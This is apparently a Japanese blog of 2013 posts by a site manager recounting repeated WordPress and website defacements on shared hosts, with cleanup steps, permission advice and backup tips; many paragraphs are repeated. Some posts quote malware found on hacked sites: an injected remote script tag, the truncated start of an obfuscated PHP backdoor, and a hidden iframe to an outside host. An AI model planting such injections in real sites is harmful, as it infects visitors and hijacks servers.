ワードプレスにであって数年経ちました。2012年春までは快適でこんなに便利なものがあることに感心し、これからのWEB制作はCMSが主流になるのだろうと思っていました。
ワードプレスも以前は手動でのインストールでしたが、今ではほとんどのホスティング業者が簡単にインストールできるツールを用意して、顧客獲得を目指すほどになりました。これにより、初心者でも容易にワードプレスをインストールすることが可能になりました。6~7年前でしたら、これほどのブログはとても手が出ないほど高額でしたが、無料で無制限にインストールできます。
ブログですからWEB上で簡単に記事を書き込めます。記事も書き込めますが、悪意のあるプログラムを書き込むこともできます。初心者はワードプレスのユーザーアカウントをadmin、パスワードにはドメイン名や会社名のような簡単な設定を選びがちです。つまり、鍵のかかっていない玄関のドアのようなものです。悪意のある人間なら容易に侵入できます。
改ざん対策をしない人が改ざんされるのは自業自得ですが、トロイやウイルスをばら撒けば、他人に迷惑をかけます。
改ざんが多発する今は、Googleのウェブマスターツール、FTPチェック、ウイルスソフトを使い、毎日チェックするような人でない限り、むやみにワードプレスをインストールするのは控えるべき時期であると思います。
2013年10月22日火曜日
2013年10月17日木曜日
ロリポップのワードプレス改ざん
Hacked by Krad Xinでタイトルやフッターのコピーライトが書き換えられ、文字コードがutf-8からutf-7に変更され文字化けがおこるロリポップ改ざんから1か月以上たちましたが、未だに改ざんされたことに気付いていないサイト所有者が多数います。
今回の改ざんは一度に8000以上のページを改ざんしたことで、大きく報道されました。個人的には5サイト改ざんされていましたが、それらを見る限り トロイを仕掛けるとかテーマを破壊するような大きなダメージはなかったような気がします。
この2年半、改ざんをいろいろ経験していたので、今回もまた起きたかと思ったのが正直なところです。
ロリポップ側の設定にも問題があったようですが、共有サーバーであればどこのホスティングでも多かれ少なかれ起こりうることです。肝心なことは、どこのサーバーを使っていても、常にサーバーを移転できるようバックアップを取っておくことです。制作会社にページ制作を依頼する場合は、バックアップ体制もフォローできる制作会社を選ぶことです。
今回の改ざんは一度に8000以上のページを改ざんしたことで、大きく報道されました。個人的には5サイト改ざんされていましたが、それらを見る限り トロイを仕掛けるとかテーマを破壊するような大きなダメージはなかったような気がします。
この2年半、改ざんをいろいろ経験していたので、今回もまた起きたかと思ったのが正直なところです。
ロリポップ側の設定にも問題があったようですが、共有サーバーであればどこのホスティングでも多かれ少なかれ起こりうることです。肝心なことは、どこのサーバーを使っていても、常にサーバーを移転できるようバックアップを取っておくことです。制作会社にページ制作を依頼する場合は、バックアップ体制もフォローできる制作会社を選ぶことです。
2013年8月20日火曜日
改ざんファイルをクリアしても残る問題
おそらく、Wordpressで作成されたホームページが最も改ざんされていると推察するにですが、最近のホスティングは簡単インストール機能でWordpressを容易にインストールできます。多少テーマの編集を習得すればだれでもそれなりのCMSページを作成できます。
その便利さの一方で、パーミッション755が多用されたWordpressページが無数作成されています。まるでご自由に改ざんしてくださいと言っているかのようです。
今年になり多くのホスティング会社は改ざん対策を強く求めるようになりました。特に共有サーバーが厄介です。自分のサイトに細心の注意を払って対策を施しても、同じサーバーを借りている他のユーザーが無知で改ざんされ放題であったら、そのサーバーを使用している全ユーザーがスパムサイトとして認定される場合があります。
Wordpressの改ざんの1つに、トロイの木馬を仕掛ける改ざんがあります。知らぬ間に自分のホームページが利用され、ウイルスメールが無数にばら撒かれます。 これを放っておくとメールサーバーのIPがスパムとしてブラックリストにのってしまいます。
ブラックリストにのると、送ったメールが相手に届かない現象が起こります。こうなると、ドメインを変更する、あるいはきれいなIPに変更する必要があります。場合によったら、ホスティング会社を変える必要もあるでしょう。
その便利さの一方で、パーミッション755が多用されたWordpressページが無数作成されています。まるでご自由に改ざんしてくださいと言っているかのようです。
今年になり多くのホスティング会社は改ざん対策を強く求めるようになりました。特に共有サーバーが厄介です。自分のサイトに細心の注意を払って対策を施しても、同じサーバーを借りている他のユーザーが無知で改ざんされ放題であったら、そのサーバーを使用している全ユーザーがスパムサイトとして認定される場合があります。
Wordpressの改ざんの1つに、トロイの木馬を仕掛ける改ざんがあります。知らぬ間に自分のホームページが利用され、ウイルスメールが無数にばら撒かれます。 これを放っておくとメールサーバーのIPがスパムとしてブラックリストにのってしまいます。
ブラックリストにのると、送ったメールが相手に届かない現象が起こります。こうなると、ドメインを変更する、あるいはきれいなIPに変更する必要があります。場合によったら、ホスティング会社を変える必要もあるでしょう。
2013年8月10日土曜日
ホームページが改ざんされたらまず行うこと
法人でも個人でもホームページを公開している以上、改ざんに対して常に準備をしておくことが大切です。
数年前までは、ホームページの改ざんは他人事のようでしたが、この1年で異常なほど増加しています。
警視庁も警告しているように、大手企業や役所のホームページも容易に改ざんされる時代になってしまいました。
警視庁が公開している新種のウィルス対策
2か月前に改ざんされたトヨタは、未だにPDFファイルで対応しているよです。マルウェアの出所を調べてみると、韓国、北朝鮮、中国、ロシア、アメリカが多く、日本は被害国のように思えます。
さて、 ホームページの改ざん対策を行っていても、改ざんされることは十分あり得ます。改ざんされた時の対処法も考えておかなければなりません。気付かずにウィルスをまき散らしてしまったら多くの人に迷惑をかけることになります。
最新のウィルスソフトをインストールしていることを前提にまとめました。
数年前までは、ホームページの改ざんは他人事のようでしたが、この1年で異常なほど増加しています。
警視庁も警告しているように、大手企業や役所のホームページも容易に改ざんされる時代になってしまいました。
警視庁が公開している新種のウィルス対策
2か月前に改ざんされたトヨタは、未だにPDFファイルで対応しているよです。マルウェアの出所を調べてみると、韓国、北朝鮮、中国、ロシア、アメリカが多く、日本は被害国のように思えます。
さて、 ホームページの改ざん対策を行っていても、改ざんされることは十分あり得ます。改ざんされた時の対処法も考えておかなければなりません。気付かずにウィルスをまき散らしてしまったら多くの人に迷惑をかけることになります。
最新のウィルスソフトをインストールしていることを前提にまとめました。
- FTPでサーバーにアクセスしてファイルをすべて削除する。同時に、FTPとサーバーのコントロールパネルのパスワードを複雑なものに変更する。
- PCをウイルススキャンする。
- バックアップデータをFTPでアップする。
- .ftpaccessでIPアクセス制限をかける
- ホームページが検索で「危険サイト」に認定されているが場合は、Googleのウェブマスタツールからマルウェアを除去した旨、報告する。
※安全が確認されたら数日で「危険サイト」は解除されます。
2013年7月22日月曜日
FTPのパスワードは複雑に
トヨタ自動車のホームページが改ざんされ、アクセスしたPCはウイルスに感染した可能性が。。。といったニュースが先月初旬に流れました。
警視庁のホームページでは、最近のホームページ改ざんが多発していることを警告しています。
以前はCMSの脆弱性が狙われていましたが、直近の改ざんはパスワードが解読される手口が多発しています。
---
7月18日に改ざんされたホームページにはfashionbagのフォルダーが作成され、その中身はWordpressでしたテーマは中国語で何者かがインストールしたようです。FTPによるアクセスです。
とりあえずの対応
警視庁のホームページでは、最近のホームページ改ざんが多発していることを警告しています。
以前はCMSの脆弱性が狙われていましたが、直近の改ざんはパスワードが解読される手口が多発しています。
---
7月18日に改ざんされたホームページにはfashionbagのフォルダーが作成され、その中身はWordpressでしたテーマは中国語で何者かがインストールしたようです。FTPによるアクセスです。
とりあえずの対応
- すべて削除して、バックアップをアップしました。
- .ftpaccessを設定して、IP制限をかけました。
- また、パスワードを英字と数字を混ぜ、10文字以上に変えました。
2013年6月26日水曜日
Wordpressの投稿記事タイトル部分が改ざん
ワードプレス、編集者モードで投稿した記事のタイトル後半部分にこの不明な記述が追加されていました。
「<script src="http://va.mu/caCS」を検索すると、多くのサイトが表示され、どうやらマルウェアのようです。多くのサイトが危険サイトになっていました。
phpファイル自体に書き込みはないようですが、タイムスタンプはあてにならないので、昨日公開されたWP3.52(改ざん対策版)にバージョンアップしようかと思いましたが、ホスティングサーバー側の仕様が古くてバージョンアップできません。
とりあえず、サーバー系のパスワードとワードプレスのパスワードを変更しました。これで様子見です。週末改ざんが行われると報告を受けましたので、もしかしたら、パスワードがハッキングされたかも???
「<script src="http://va.mu/caCS」を検索すると、多くのサイトが表示され、どうやらマルウェアのようです。多くのサイトが危険サイトになっていました。
phpファイル自体に書き込みはないようですが、タイムスタンプはあてにならないので、昨日公開されたWP3.52(改ざん対策版)にバージョンアップしようかと思いましたが、ホスティングサーバー側の仕様が古くてバージョンアップできません。
とりあえず、サーバー系のパスワードとワードプレスのパスワードを変更しました。これで様子見です。週末改ざんが行われると報告を受けましたので、もしかしたら、パスワードがハッキングされたかも???
2013年6月25日火曜日
20000ファイルが改ざん
2週間前、またホームページが改ざんされました。
今度はヘテムルサーバーにアップしていたwordpressのphpファイル、全部で約20000ファイルです。
各ファイルのヘッダー部分に下記のphpタグが埋め込まれていました。
<?php $zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; @error_reporting(0); $zend_framework
※長いので以下省略
10日ほどでようやく削除が終わり、wordpressの動作確認を行っています。
今回の改ざんは以前の改ざんとは異なるものです。
1.
改ざんファイルのタイムスタンプが更新されていない。
2010年のファイルまで改ざんされ、しかもタイムスタンプは2010年のままです。
2.
不明の管理者がwordpressに追加されている。
3.
すべてのphpファイルに上部のタグが埋め込まれる。
※以前はindex.phpフィルが主でした。
追記
つい先日Wordpress3.52が公開されました。51から52ですが、内容は改ざん対策です。
来週、バージョンアップしようと思います。
ほぼ同じ時期にトヨタ自動車のサイトが改ざんされ、いまだにメンテナンス中です。今年になり、CMS系サイトへの改ざんは加速しています。
今度はヘテムルサーバーにアップしていたwordpressのphpファイル、全部で約20000ファイルです。
各ファイルのヘッダー部分に下記のphpタグが埋め込まれていました。
<?php $zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; @error_reporting(0); $zend_framework
※長いので以下省略
10日ほどでようやく削除が終わり、wordpressの動作確認を行っています。
今回の改ざんは以前の改ざんとは異なるものです。
1.
改ざんファイルのタイムスタンプが更新されていない。
2010年のファイルまで改ざんされ、しかもタイムスタンプは2010年のままです。
2.
不明の管理者がwordpressに追加されている。
3.
すべてのphpファイルに上部のタグが埋め込まれる。
※以前はindex.phpフィルが主でした。
追記
つい先日Wordpress3.52が公開されました。51から52ですが、内容は改ざん対策です。
来週、バージョンアップしようと思います。
ほぼ同じ時期にトヨタ自動車のサイトが改ざんされ、いまだにメンテナンス中です。今年になり、CMS系サイトへの改ざんは加速しています。
2013年5月11日土曜日
やっかいなマルウェア 続き
MaAfee、トレンドマイクロ、ノートン、そしてGoogleウェブマスターツールまで検知しないマルウェアに改ざんされているホームページは、本日ホスティングサーバー会社から下記の連絡を受け閉鎖されました。
----
被害拡大を防ぐため、該当ファイルのパーミッションを「000」へ変更いたしました。
----
改ざんされたホームページに、Wordpressはインストールされていませんでしたが、管理用にphpを使っていました。その階層のindex.phpにトロイ系のソースが仕込まれ、それがhtmlファイルを改ざんした主犯のような気がします。
結局、Googleのウェブマスタツールはこのマルウェアを検知できませんでした。今まで、このツールで数百ものホームページをチェックしていたので、改ざんをチェックできないマルウェアの存在は正直ショックです。
改ざん対策の現時点での総括
Wordpressは以下を実行
最新バージョンにする
※自動更新ではなく手動でおこなう。自動で行う場合、パーミッションの変更をFTPで行わなければならないので、むしろ手間になる。
パーミッションの変更
phpのパーミッションは604(config.phpは404)
ディレクトリは705
htaccessは604
WAFを導入する
WAFをオンにすると、動作しなくなる機能(プラグイン)がある。
定期的にファイルのデイトスタンプをチェックする。特にindex.phpの育成日付はチェック要。
当然ですが、バックアップはこまめに行う。
----
被害拡大を防ぐため、該当ファイルのパーミッションを「000」へ変更いたしました。
----
改ざんされたホームページに、Wordpressはインストールされていませんでしたが、管理用にphpを使っていました。その階層のindex.phpにトロイ系のソースが仕込まれ、それがhtmlファイルを改ざんした主犯のような気がします。
結局、Googleのウェブマスタツールはこのマルウェアを検知できませんでした。今まで、このツールで数百ものホームページをチェックしていたので、改ざんをチェックできないマルウェアの存在は正直ショックです。
改ざん対策の現時点での総括
Wordpressは以下を実行
最新バージョンにする
※自動更新ではなく手動でおこなう。自動で行う場合、パーミッションの変更をFTPで行わなければならないので、むしろ手間になる。
パーミッションの変更
phpのパーミッションは604(config.phpは404)
ディレクトリは705
htaccessは604
WAFを導入する
WAFをオンにすると、動作しなくなる機能(プラグイン)がある。
定期的にファイルのデイトスタンプをチェックする。特にindex.phpの育成日付はチェック要。
当然ですが、バックアップはこまめに行う。
2013年5月6日月曜日
改ざんのあったホスティング
改ざんはどんなに対策を施しても避けられないと、最近は感じています。
仕事の関係で多くのレンタルサーバー会社のサーバーを取り扱っています。2年前にまず、ヘテムル、1年前にロリポップ、CPIとネットラピュタ等が改ざんされました。
ヘテムルの時は最悪でした、マルチィドメインで約30ドメイン活用していてすべてが改ざんされました。侵入口はWordpressです。バックアップがあるにせよ、すべて復旧させるのは非常に手間のかかることでした。正直、サーバーの移転を考えました。
ところが、当たり前のことですが、サーバー会社を変えても対策をしていなかったら、また改ざんされる可能性が高いことを知りました。ヘテムル側の対応は大変親切で改ざんされたデータをすべて送ってくれましたので、継続してヘテムルを使用しています。
Wordpressがやっかいなのは、対策用にファイルのパーミッションを604、404、705に手作業で変えても自動アップグレードでまた、644、755に戻ってしまいます。アップグレードのたびに手作業でパーミッションを変更しなければなりません。
多くのホスティング業者はWordpressを売りにしているのですが、改ざん等の対策はユーザーの責任としています。
仕事の関係で多くのレンタルサーバー会社のサーバーを取り扱っています。2年前にまず、ヘテムル、1年前にロリポップ、CPIとネットラピュタ等が改ざんされました。
ヘテムルの時は最悪でした、マルチィドメインで約30ドメイン活用していてすべてが改ざんされました。侵入口はWordpressです。バックアップがあるにせよ、すべて復旧させるのは非常に手間のかかることでした。正直、サーバーの移転を考えました。
ところが、当たり前のことですが、サーバー会社を変えても対策をしていなかったら、また改ざんされる可能性が高いことを知りました。ヘテムル側の対応は大変親切で改ざんされたデータをすべて送ってくれましたので、継続してヘテムルを使用しています。
Wordpressがやっかいなのは、対策用にファイルのパーミッションを604、404、705に手作業で変えても自動アップグレードでまた、644、755に戻ってしまいます。アップグレードのたびに手作業でパーミッションを変更しなければなりません。
多くのホスティング業者はWordpressを売りにしているのですが、改ざん等の対策はユーザーの責任としています。
2013年5月3日金曜日
やっかいなマルウェア
MaAfee、トレンドマイクロ、ノートンなどの有名ウィルスソフトでも認識されないマルウェアがあるようです。
インターネットウィルスは自然界のインフルエンザに似ていて、常に進化し、それに対するワクチンを開発するように、対策が後手になります。
ケチなので私のPCは無料のAVASTでウィルス対策をしています。ところが、先日AVASTがトロイの木馬を検知しましたと、ある知人のURLにアクセスした際に警告を出しました。
知人はウイルスバスタが常時起動していて問題なくページを表示できると言うので、また、AVASTが誤認識したのだとその時は思いました。 念のため、FTPでデータのデイトスタンプをチェックしてみると、半年以上更新していないHTMLファイルがすべて1週間前の日付でアップデートされていました。
この2年間、Wordpressのphpファイルへの改ざん対策でうんざりしていましたが、どうやら、これは新手の改ざんではないか???
いずれにしてもhtmlへの改ざんは初めてでした。しかも、Googleのウェブマスターツールのマルウェア検知で、問題なしでした。
これは改ざんであっても無害なのか???
FTPでもファイルの中身を見ることができない。
一体、どんな改ざんがあるのだろう???
検索しても日本のサイトではこの現象は見当たらない。satan.phpの時もそうでした。
数日後、たまたま、英語サイトでオンラインチェックできるページを見つけました。
http://sitecheck.sucuri.net/scanner/
ここで知人のドメインを入力すると下記のマルウェアがあることがわかりました。
</html><iframe src="http://autopd.de/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/
どうやらautopd.deも改ざんされているようで、こんどはautopd.deチェックすると
ロシアのURLらしき記述が多数見つかりました。
Wordpressでの改ざんパターンに似ていますが、違いは「問題なし」で サイトへのアクセスが許可されていることです。
インターネットウィルスは自然界のインフルエンザに似ていて、常に進化し、それに対するワクチンを開発するように、対策が後手になります。
ケチなので私のPCは無料のAVASTでウィルス対策をしています。ところが、先日AVASTがトロイの木馬を検知しましたと、ある知人のURLにアクセスした際に警告を出しました。
知人はウイルスバスタが常時起動していて問題なくページを表示できると言うので、また、AVASTが誤認識したのだとその時は思いました。 念のため、FTPでデータのデイトスタンプをチェックしてみると、半年以上更新していないHTMLファイルがすべて1週間前の日付でアップデートされていました。
この2年間、Wordpressのphpファイルへの改ざん対策でうんざりしていましたが、どうやら、これは新手の改ざんではないか???
いずれにしてもhtmlへの改ざんは初めてでした。しかも、Googleのウェブマスターツールのマルウェア検知で、問題なしでした。
これは改ざんであっても無害なのか???
FTPでもファイルの中身を見ることができない。
一体、どんな改ざんがあるのだろう???
検索しても日本のサイトではこの現象は見当たらない。satan.phpの時もそうでした。
数日後、たまたま、英語サイトでオンラインチェックできるページを見つけました。
http://sitecheck.sucuri.net/scanner/
ここで知人のドメインを入力すると下記のマルウェアがあることがわかりました。
</html><iframe src="http://autopd.de/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/
どうやらautopd.deも改ざんされているようで、こんどはautopd.deチェックすると
ロシアのURLらしき記述が多数見つかりました。
Wordpressでの改ざんパターンに似ていますが、違いは「問題なし」で サイトへのアクセスが許可されていることです。
2013年3月14日木曜日
ホームページの改ざん(1)
丁度、2011年末ごろから、Wordpressへの改ざんが増え始め、大変苦労した(正確には、苦労しているの進行形です)経験があります。
やっと、あるパターンの改ざんを処理できたと思いきや、新たな改ざんがしばらくすると流行りだします。これを仕掛けている人間は「愉快犯」、それとも何かメリットでもあるのでしょうか。
最初は、ヘテムルでレンタルしていたサーバーが次から次への改ざんされました。年末年始も容赦なく改ざんされ、サーバーを他に移管しようかと真剣に考えました。ヘテムル側は、cgi、php、ディレクトリーのパーミションを変更してくれましたが、改ざんされたファイルが多すぎて、途方もない作業でした。何とか、改ざんが収まり一瞬安心していたところ、今度は、ロリポップのサーバー、CPIのサーバーと、Wordpressをインストールしたホームページが改ざんされ始めました。
以前は、index.back.phpのようなファイルや意味不明のファイルが育成されていましたが、最近ではジャバスクリプトファイル(拡張子がjsのファイル)にソースが書き込まれ、index.phpが改ざんされるケースも増えてきました。また、Boxtheme.zip(解凍すると、plugin.phpとsatan.phpが現れてupgradeディレクトリ内に育成され、改ざんを開始するようなパターンも発見しました。
Boxtheme.zipをGoogleで検索すると、Index of /wp-content/uploadsのようなタイトルのサイトが多く表示されます。どうやらこれらのサイトはすべて改ざんされている、あるいは最近まで改ざんされていたサイトのようです。日本のサイトはあまり見出せないので、とりあえず、育成されたBoxthemeディレクトリーを削除しました。こんなことをしても何の解決にもならなかもしれませんが、とりあえず、様子見です。
それでは、次回報告まで
やっと、あるパターンの改ざんを処理できたと思いきや、新たな改ざんがしばらくすると流行りだします。これを仕掛けている人間は「愉快犯」、それとも何かメリットでもあるのでしょうか。
最初は、ヘテムルでレンタルしていたサーバーが次から次への改ざんされました。年末年始も容赦なく改ざんされ、サーバーを他に移管しようかと真剣に考えました。ヘテムル側は、cgi、php、ディレクトリーのパーミションを変更してくれましたが、改ざんされたファイルが多すぎて、途方もない作業でした。何とか、改ざんが収まり一瞬安心していたところ、今度は、ロリポップのサーバー、CPIのサーバーと、Wordpressをインストールしたホームページが改ざんされ始めました。
以前は、index.back.phpのようなファイルや意味不明のファイルが育成されていましたが、最近ではジャバスクリプトファイル(拡張子がjsのファイル)にソースが書き込まれ、index.phpが改ざんされるケースも増えてきました。また、Boxtheme.zip(解凍すると、plugin.phpとsatan.phpが現れてupgradeディレクトリ内に育成され、改ざんを開始するようなパターンも発見しました。
Boxtheme.zipをGoogleで検索すると、Index of /wp-content/uploadsのようなタイトルのサイトが多く表示されます。どうやらこれらのサイトはすべて改ざんされている、あるいは最近まで改ざんされていたサイトのようです。日本のサイトはあまり見出せないので、とりあえず、育成されたBoxthemeディレクトリーを削除しました。こんなことをしても何の解決にもならなかもしれませんが、とりあえず、様子見です。
それでは、次回報告まで
登録:
投稿 (Atom)